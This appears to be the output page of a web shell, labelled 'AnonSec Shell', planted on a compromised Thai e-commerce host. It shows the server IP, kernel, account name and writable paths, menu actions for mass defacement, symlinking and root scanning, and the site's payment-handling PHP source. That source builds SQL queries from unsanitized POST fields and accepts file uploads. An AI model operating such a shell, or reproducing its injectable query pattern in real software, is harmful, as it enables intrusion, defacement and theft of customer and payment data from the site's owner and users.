AnonSec Shell
Server IP : 104.21.37.246  /  Your IP : 172.71.28.145   [ Reverse IP ]
Web Server : Apache
System : Linux cpanel01wh.bkk1.cloud.z.com 2.6.32-954.3.5.lve1.4.59.el6.x86_64 #1 SMP Thu Dec 6 05:11:00 EST 2018 x86_64
User : cp648411 ( 1354)
PHP Version : 7.2.34
Disable Function : NONE
Domains : 0 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home2/cp648411/public_html/simded.com/order_member/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /home2/cp648411/public_html/simded.com/order_member/ajax_payment.php
<?php 
include('../include72/header.php');
 ?>

<?php 
ini_set('display_errors', 1);
error_reporting(E_ALL);
$folder = 'payment';

/*

echo '<pre>';
print_r($_POST);
echo '</pre>';

echo '<pre>';
print_r($_FILES);
echo '</pre>';


exit;*/

if($_FILES["file_sh"]["error"] == 0)
{
	$name_img = $image_class->file_up($_FILES["file_sh"],$folder,$upload);
}

 $list_bk = array('table'=>'bank','where'=>'status = 1 AND id = "'.$_POST['bank_id'].'"');
                            $view_bk = $view_db->view($list_bk);
                            $row_bk = $view_db->q($view_bk);



$price = str_replace(',', '', $_POST["price"]);
if($_POST["time_p"] !== ''){ $time = $util_class->day_Ymdtime($_POST['time_p']);}else{ $time = '';}


$list_cm= array('table'=>'payment_order','count'=>'MAX(id) AS maxid','where'=>'1');
$view_cm = $view_db->view($list_cm);
$row_cm = $view_db->q($view_cm);
$maxid = $row_cm['maxid'] + 1;
$list = array(
		'table'=>'payment_order',
		'id'=>"'".$maxid."'",
		'order_id'=>"'".$_POST['pm_orderid']."'",
		'bank_id'=>"'".$_POST['bank_id']."'",
		'bank_name'=>"'".$row_bk['name']."'",
		'price'=>"'".$price."'",
		'time'=>"'".$time."'",
		'file'=>"'".$name_img."'",
		'createdate'=>"'".$date."'",
		'status'=>'1'
	);
	$add = $actiondata_db->add_db($list);

if($add['suc'] == 1)
{

	$list = array(
		'table'=>'orders',
		'id'=>$_POST['pm_orderid'],
		'payment_order_id'=>$maxid
	);
	$edit_db = $actiondata_db->edit_db($list);
	//print_r($edit_db);
	/*?>
	 <div class="alert alert-success alert-dismissible" role="alert">
	  <button type="button" class="close" data-dismiss="alert" aria-label="Close"><span aria-hidden="true" style="font-family:Verdana, Geneva, sans-serif;">&times;</span></button>
	  <strong>Well done!</strong>  &nbsp;  <span> บันทึกข้อมูลเสร็จเรียบร้อย</span>
	</div>
	<?php*/
	header("Location: index.php");
}
else
{
	?>
	<div class="alert alert-danger" role="alert">
	  <button type="button" class="close" data-dismiss="alert" aria-label="Close" onclick="window.location.href='index.php'">
			<span aria-hidden="true" style="font-family:Verdana, Geneva, sans-serif;">&times;</span>
		</button>
	  <strong>Warning!</strong>  &nbsp;  <span> ระบบมีปัญหากรุณาลองใหม่อีกครั้งค่ะ</span>
	</div>
	<?php
}


?>

Anon7 - 2022
AnonSec Team